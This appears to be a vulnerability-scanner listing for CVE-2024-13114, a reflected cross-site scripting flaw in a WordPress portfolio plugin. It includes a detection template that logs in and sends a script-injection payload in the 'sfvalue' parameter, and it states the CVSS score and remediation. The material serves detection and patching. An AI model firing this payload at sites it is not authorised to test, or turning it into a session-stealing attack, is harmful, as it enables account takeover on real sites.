WP Projects Portfolio <= 3.0 - Cross-Site Scripting
CVE-2024-13114
Verified
Description
WP Projects Portfolio with Client Testimonials WordPress plugin <= 3.0 contains a reflected cross-site scripting caused by unsanitized parameter output, letting attackers execute scripts in the context of high privilege users, exploit requires attacker to craft a malicious URL.
Severity
Medium
CVSS Score
6.1
Exploit Probability
2%
Affected Product
wp_projects_portfolio_with_client_testimonials
Published Date
February 5, 2026
Template Author
sourabh-sahu
CVE-2024-13114.yaml
id: CVE-2024-13114
info:
name: WP Projects Portfolio <= 3.0 - Cross-Site Scripting
author: Sourabh-Sahu
severity: medium
description: |
WP Projects Portfolio with Client Testimonials WordPress plugin <= 3.0 contains a reflected cross-site scripting caused by unsanitized parameter output, letting attackers execute scripts in the context of high privilege users, exploit requires attacker to craft a malicious URL.
impact: |
Attackers can execute arbitrary scripts in the context of high privilege users, potentially leading to session hijacking or privilege escalation.
remediation: |
Update to the latest version of the plugin where the issue is fixed.
reference:
- https://wpscan.com/vulnerability/0cecda12-590a-42a6-b10b-e0efe7fb3a3a/
- https://nvd.nist.gov/vuln/detail/CVE-2024-13114
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2024-13114
cwe-id: CWE-79
epss-score: 0.02069
epss-percentile: 0.84156
cpe: cpe:2.3:a:phptechie:wp_projects_portfolio_with_client_testimonials:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 3
vendor: phptechie
product: wp_projects_portfolio_with_client_testimonials
tags: cve,cve2024,wordpress,wp-plugin,wp-projects-portfolio,xss,authenticated
flow: http(1) && http(2)
http:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
Cookie: wordpress_test_cookie=WP%20Cookie%20check
log={{username}}&pwd={{password}}&wp-submit=Log+In
matchers:
- type: dsl
dsl:
- status_code == 302
- contains(header, "wordpress_logged_in")
condition: and
internal: true
- raw:
- |
GET /wp-admin/edit.php?post_type=wpprojects_portfolio&sfvalue=1"></script><script>alert(document.domain)</script><script>` HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- contains_all(body, "></script><script>alert(document.domain)</script><script>", "wpprojects_portfolio")
- contains(content_type, "text/html")
- status_code == 200
condition: and
# digest: 4b0a004830460221009e972e793f1ff5c509594c784bb9bbaad429702a7546aa4c6930491e593d9aae022100b73e21c807be6919c11d74f4d1dfc17fd82cf7d35d2c03e2bab9c680a262f9a0:922c64590222798bb761d5b6d8e729506.1Score
CVSS Metrics
CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
CVE ID:
cve-2024-13114
CWE ID:
cwe-79
Remediation Steps
Update to the latest version of the plugin where the issue is fixed.